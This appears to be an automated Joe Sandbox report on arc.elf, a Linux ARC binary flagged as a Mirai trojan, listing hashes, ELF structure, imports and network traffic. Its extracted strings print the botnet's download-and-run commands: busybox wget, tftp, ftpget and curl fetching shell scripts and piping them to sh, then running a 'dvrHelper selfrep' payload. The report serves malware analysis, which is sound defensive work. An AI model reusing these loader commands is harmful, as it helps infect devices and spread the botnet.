Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arc.elf

Overview

General Information

Sample name:arc.elf
Analysis ID:1583928
MD5:ed06a2f6655c474787be66205448f867
SHA1:c387de8a56a4557c5bcc7f7729b259e607a79713
SHA256:3577e6a74c88c22726bde4637855fa7cbb944fcda5e1b6b493ea4718cd6bf7ea
Tags:elfuser-abuse_ch
Infos:
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1583928
Start date and time:2025-01-03 21:27:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 11s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arc.elf
Detection:MAL
Classification:mal48.linELF@0/0@2/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • No process behavior to analyse as no analysis process or sample was found
  • VT rate limit hit for: arc.elf
Command:/tmp/arc.elf
PID:5434
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arc.elfReversingLabs: Detection: 18%
Source: arc.elfString: ~/proc/self/exe/bin/bash/bin/sh/bin/dashbashshftpwgettftpncnetcatnmaptcpdumpsocatcurlbusyboxpythonrebootechoinitcroniptablessshdtelnettelnetdtftpdrshdrexecdftpdxinetdpftp/bin/loginself/proc/
Source: arc.elfString: /bin/bash/bin/sh/bin/dashbashshftpwgettftpncnetcatnmaptcpdumpsocatcurlbusyboxpythonrebootechoinitcroniptablessshdtelnettelnetdtftpdrshdrexecdftpdxinetdpftp/bin/login/dev/watchdog/dev/misc/watchdog/
Source: arc.elfString: /bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: global trafficTCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: arc.elfString found in binary or memory: http:///curl.sh
Source: arc.elfString found in binary or memory: http:///wget.sh
Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 443
Source: Initial sampleString containing 'busybox' found: busybox
Source: Initial sampleString containing 'busybox' found: ~/proc/self/exe/bin/bash/bin/sh/bin/dashbashshftpwgettftpncnetcatnmaptcpdumpsocatcurlbusyboxpythonrebootechoinitcroniptablessshdtelnettelnetdtftpdrshdrexecdftpdxinetdpftp/bin/loginself/proc/
Source: Initial sampleString containing 'busybox' found: /bin/bash/bin/sh/bin/dashbashshftpwgettftpncnetcatnmaptcpdumpsocatcurlbusyboxpythonrebootechoinitcroniptablessshdtelnettelnetdtftpdrshdrexecdftpdxinetdpftp/bin/login/dev/watchdog/dev/misc/watchdog/
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryusage: busyboxGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > .d
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sampleString containing 'busybox' found: /bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/0@2/0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path InterceptionDirect Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
SourceDetectionScannerLabelLink
arc.elf18%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http:///wget.sharc.elffalse
      high
      http:///curl.sharc.elffalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        185.125.190.26
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        185.125.190.26mips.elfGet hashmaliciousUnknownBrowse
          i586.elfGet hashmaliciousMiraiBrowse
            spc.elfGet hashmaliciousUnknownBrowse
              x86.elfGet hashmaliciousMiraiBrowse
                armv6l.elfGet hashmaliciousMiraiBrowse
                  arm5.elfGet hashmaliciousUnknownBrowse
                    boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                      wind.sh4.elfGet hashmaliciousMiraiBrowse
                        wind.arc.elfGet hashmaliciousMiraiBrowse
                          DEMONS.arm5.elfGet hashmaliciousUnknownBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            daisy.ubuntu.com1.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.24
                            ub8ehJSePAfc9FYqZIT6.spc.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.24
                            45678.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.24
                            mipsle44555.elfGet hashmaliciousUnknownBrowse
                            • 162.213.35.24
                            cats.elfGet hashmaliciousConnectBackBrowse
                            • 162.213.35.24
                            powerpc-440fp.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.25
                            x86_64.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.24
                            arm6.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.25
                            armv7l.elfGet hashmaliciousMiraiBrowse
                            • 162.213.35.24
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CANONICAL-ASGBarm5.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            x86.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            arm4.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            arm6.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            mips.elfGet hashmaliciousUnknownBrowse
                            • 185.125.190.26
                            mpsl.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            ub8ehJSePAfc9FYqZIT6.i686.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            ub8ehJSePAfc9FYqZIT6.sh4.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            ub8ehJSePAfc9FYqZIT6.x86_64.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            ub8ehJSePAfc9FYqZIT6.x86.elfGet hashmaliciousUnknownBrowse
                            • 91.189.91.42
                            No context
                            No context
                            No created / dropped files found
                            File type:ELF 32-bit LSB executable, Synopsys ARCompact ARC700 cores, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, for GNU/Linux 4.8.0, stripped
                            Entropy (8bit):5.989403244114171
                            TrID:
                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                            File name:arc.elf
                            File size:67'696 bytes
                            MD5:ed06a2f6655c474787be66205448f867
                            SHA1:c387de8a56a4557c5bcc7f7729b259e607a79713
                            SHA256:3577e6a74c88c22726bde4637855fa7cbb944fcda5e1b6b493ea4718cd6bf7ea
                            SHA512:7d300474992a0eb280017e570ce9c15ea2a004b3261ca8bcab507a7add7e68766faee08ecbe65156b3071f3552af06934802a7e6c2341f9498432f99a1b8739a
                            SSDEEP:768:k5dRx0siKaoNAY67ureccWLV3THSEiAWDar7P0LM8IlFh5ZnfZRDniQb3:kbRqiNH6m5cKV3DDtKM8ClZRDniQb
                            TLSH:8663C878D016716DE7E8B0B4F90310F62C010F54AAAC92C365CFB4F6EE68745AA4AF17
                            File Content Preview:.ELF..............].........4...........4. ...(.........4...4...4.......................4...4...4................................................ ......D...D...D.......8........ ......T...T...T.......................H...H...H... ... ...........Q.td.......

                            ELF header

                            Class:ELF32
                            Data:2's complement, little endian
                            Version:1 (current)
                            Machine:<unknown>
                            Version Number:0x1
                            Type:EXEC (Executable file)
                            OS/ABI:UNIX - System V
                            ABI Version:0
                            Entry Point Address:0x10e84
                            Flags:0x403
                            ELF Header Size:52
                            Program Header Offset:52
                            Program Header Size:32
                            Number of Program Headers:8
                            Section Header Offset:66816
                            Section Header Size:40
                            Number of Section Headers:22
                            Header String Table Index:21
                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                            NULL0x00x00x00x00x0000
                            .interpPROGBITS0x101340x1340x140x00x2A001
                            .note.ABI-tagNOTE0x101480x1480x200x00x2A004
                            .hashHASH0x101680x1680x1980x40x2A404
                            .dynsymDYNSYM0x103000x3000x3f00x100x2A514
                            .dynstrSTRTAB0x106f00x6f00x1cd0x00x2A001
                            .rela.pltRELA0x108c00x8c00x2c40xc0x42AI4164
                            .initPROGBITS0x10b840xb840x220x00x6AX001
                            .pltPROGBITS0x10ba80xba80x2dc0x00x6AX004
                            .textPROGBITS0x10e840xe840xc6000x00x6AX004
                            .finiPROGBITS0x1d4840xd4840x160x00x6AX001
                            .rodataPROGBITS0x1d49c0xd49c0xe340x00x2A004
                            .eh_framePROGBITS0x1e2d00xe2d00x40x00x2A004
                            .ctorsPROGBITS0x21f440xff440x80x00x3WA004
                            .dtorsPROGBITS0x21f4c0xff4c0x80x00x3WA004
                            .dynamicDYNAMIC0x21f540xff540xa80x80x3WA504
                            .got.pltPROGBITS0x21ffc0xfffc0xf80x00x3WA004
                            .dataPROGBITS0x220f40x100f40x2f00x00x3WA004
                            .bssNOBITS0x223e40x103e40x980x00x3WA004
                            .commentPROGBITS0x00x103e40x430x10x30MS001
                            .ARC.attributes<unknown>0x00x104270x300x00x0001
                            .shstrtabSTRTAB0x00x104570xa90x00x0001
                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                            PHDR0x340x100340x100340x1000x1002.50030x5R E0x4
                            INTERP0x1340x101340x101340x140x143.68420x4R 0x1/lib/ld-uClibc.so.0.interp
                            LOAD0x00x100000x100000xe2d40xe2d46.43780x5R E0x2000.interp .note.ABI-tag .hash .dynsym .dynstr .rela.plt .init .plt .text .fini .rodata .eh_frame
                            LOAD0xff440x21f440x21f440x4a00x5384.11430x6RW 0x2000.ctors .dtors .dynamic .got.plt .data .bss
                            DYNAMIC0xff540x21f540x21f540xa80xa82.00580x6RW 0x4.dynamic
                            NOTE0x1480x101480x101480x200x201.49880x4R 0x4.note.ABI-tag
                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                            GNU_RELRO0xff440x21f440x21f440xbc0xbc2.19660x4R 0x1.ctors .dtors .dynamic
                            TypeMetaValueTag
                            DT_NEEDEDsharedliblibc.so.00x1
                            DT_INITvalue0x10b880xc
                            DT_FINIvalue0x1d4880xd
                            DT_HASHvalue0x101680x4
                            DT_STRTABvalue0x106f00x5
                            DT_SYMTABvalue0x103000x6
                            DT_STRSZbytes4610xa
                            DT_SYMENTbytes160xb
                            DT_INITvalue0x10b880xc
                            DT_FINIvalue0x1d4880xd
                            DT_DEBUGvalue0x00x15
                            DT_PLTGOTvalue0x10ba80x3
                            DT_PLTRELSZbytes7080x2
                            DT_PLTRELpltrelDT_RELA0x14
                            DT_JMPRELvalue0x108c00x17
                            DT_NULLvalue0x00x0
                            NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                            .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            __bss_start.dynsym0x223e40NOTYPE<unknown>DEFAULT18
                            __errno_location.dynsym0x10de80FUNC<unknown>DEFAULTSHN_UNDEF
                            __uClibc_main.dynsym0x10d700FUNC<unknown>DEFAULTSHN_UNDEF
                            _edata.dynsym0x223e40NOTYPE<unknown>DEFAULT17
                            _end.dynsym0x2247c0NOTYPE<unknown>DEFAULT18
                            accept.dynsym0x10c8c0FUNC<unknown>DEFAULTSHN_UNDEF
                            atoi.dynsym0x10e000FUNC<unknown>DEFAULTSHN_UNDEF
                            bind.dynsym0x10cc80FUNC<unknown>DEFAULTSHN_UNDEF
                            calloc.dynsym0x10ca40FUNC<unknown>DEFAULTSHN_UNDEF
                            chdir.dynsym0x10cec0FUNC<unknown>DEFAULTSHN_UNDEF
                            clock.dynsym0x10e240FUNC<unknown>DEFAULTSHN_UNDEF
                            close.dynsym0x10e540FUNC<unknown>DEFAULTSHN_UNDEF
                            closedir.dynsym0x10e3c0FUNC<unknown>DEFAULTSHN_UNDEF
                            connect.dynsym0x10bd80FUNC<unknown>DEFAULTSHN_UNDEF
                            exit.dynsym0x10df40FUNC<unknown>DEFAULTSHN_UNDEF
                            fcntl.dynsym0x10e480FUNC<unknown>DEFAULTSHN_UNDEF
                            fork.dynsym0x10d640FUNC<unknown>DEFAULTSHN_UNDEF
                            free.dynsym0x10e600FUNC<unknown>DEFAULTSHN_UNDEF
                            getpid.dynsym0x10bfc0FUNC<unknown>DEFAULTSHN_UNDEF
                            getppid.dynsym0x10dac0FUNC<unknown>DEFAULTSHN_UNDEF
                            getsockname.dynsym0x10e780FUNC<unknown>DEFAULTSHN_UNDEF
                            getsockopt.dynsym0x10dd00FUNC<unknown>DEFAULTSHN_UNDEF
                            htonl.dynsym0x10d340FUNC<unknown>DEFAULTSHN_UNDEF
                            htons.dynsym0x10ddc0FUNC<unknown>DEFAULTSHN_UNDEF
                            inet_addr.dynsym0x10cd40FUNC<unknown>DEFAULTSHN_UNDEF
                            inet_ntoa.dynsym0x10da00FUNC<unknown>DEFAULTSHN_UNDEF
                            ioctl.dynsym0x10bc00FUNC<unknown>DEFAULTSHN_UNDEF
                            kill.dynsym0x10cbc0FUNC<unknown>DEFAULTSHN_UNDEF
                            listen.dynsym0x10d580FUNC<unknown>DEFAULTSHN_UNDEF
                            malloc.dynsym0x10c2c0FUNC<unknown>DEFAULTSHN_UNDEF
                            memcpy.dynsym0x10c140FUNC<unknown>DEFAULTSHN_UNDEF
                            memset.dynsym0x10d7c0FUNC<unknown>DEFAULTSHN_UNDEF
                            ntohl.dynsym0x10ce00FUNC<unknown>DEFAULTSHN_UNDEF
                            ntohs.dynsym0x10d940FUNC<unknown>DEFAULTSHN_UNDEF
                            open.dynsym0x10e180FUNC<unknown>DEFAULTSHN_UNDEF
                            opendir.dynsym0x10dc40FUNC<unknown>DEFAULTSHN_UNDEF
                            prctl.dynsym0x10c080FUNC<unknown>DEFAULTSHN_UNDEF
                            rand.dynsym0x10d040FUNC<unknown>DEFAULTSHN_UNDEF
                            read.dynsym0x10d1c0FUNC<unknown>DEFAULTSHN_UNDEF
                            readdir.dynsym0x10c680FUNC<unknown>DEFAULTSHN_UNDEF
                            readlink.dynsym0x10c200FUNC<unknown>DEFAULTSHN_UNDEF
                            realloc.dynsym0x10d4c0FUNC<unknown>DEFAULTSHN_UNDEF
                            recv.dynsym0x10bcc0FUNC<unknown>DEFAULTSHN_UNDEF
                            recvfrom.dynsym0x10c440FUNC<unknown>DEFAULTSHN_UNDEF
                            rename.dynsym0x10c980FUNC<unknown>DEFAULTSHN_UNDEF
                            select.dynsym0x10c5c0FUNC<unknown>DEFAULTSHN_UNDEF
                            send.dynsym0x10c800FUNC<unknown>DEFAULTSHN_UNDEF
                            sendto.dynsym0x10d400FUNC<unknown>DEFAULTSHN_UNDEF
                            setsid.dynsym0x10e300FUNC<unknown>DEFAULTSHN_UNDEF
                            setsockopt.dynsym0x10cf80FUNC<unknown>DEFAULTSHN_UNDEF
                            sigaddset.dynsym0x10c740FUNC<unknown>DEFAULTSHN_UNDEF
                            sigemptyset.dynsym0x10be40FUNC<unknown>DEFAULTSHN_UNDEF
                            signal.dynsym0x10d100FUNC<unknown>DEFAULTSHN_UNDEF
                            sigprocmask.dynsym0x10e6c0FUNC<unknown>DEFAULTSHN_UNDEF
                            sleep.dynsym0x10c380FUNC<unknown>DEFAULTSHN_UNDEF
                            socket.dynsym0x10c500FUNC<unknown>DEFAULTSHN_UNDEF
                            srand.dynsym0x10d880FUNC<unknown>DEFAULTSHN_UNDEF
                            strlen.dynsym0x10e0c0FUNC<unknown>DEFAULTSHN_UNDEF
                            strncpy.dynsym0x10d280FUNC<unknown>DEFAULTSHN_UNDEF
                            time.dynsym0x10db80FUNC<unknown>DEFAULTSHN_UNDEF
                            usleep.dynsym0x10bf00FUNC<unknown>DEFAULTSHN_UNDEF
                            write.dynsym0x10cb00FUNC<unknown>DEFAULTSHN_UNDEF
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 3, 2025 21:27:57.517134905 CET48202443192.168.2.13185.125.190.26
                            Jan 3, 2025 21:28:28.492882013 CET48202443192.168.2.13185.125.190.26
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 3, 2025 21:30:31.227916956 CET5900453192.168.2.138.8.8.8
                            Jan 3, 2025 21:30:31.227962971 CET4421753192.168.2.138.8.8.8
                            Jan 3, 2025 21:30:31.234395027 CET53590048.8.8.8192.168.2.13
                            Jan 3, 2025 21:30:31.234600067 CET53442178.8.8.8192.168.2.13
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jan 3, 2025 21:30:31.227916956 CET192.168.2.138.8.8.80x6dcdStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                            Jan 3, 2025 21:30:31.227962971 CET192.168.2.138.8.8.80xa8fStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jan 3, 2025 21:30:31.234395027 CET8.8.8.8192.168.2.130x6dcdNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                            Jan 3, 2025 21:30:31.234395027 CET8.8.8.8192.168.2.130x6dcdNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                            System Behavior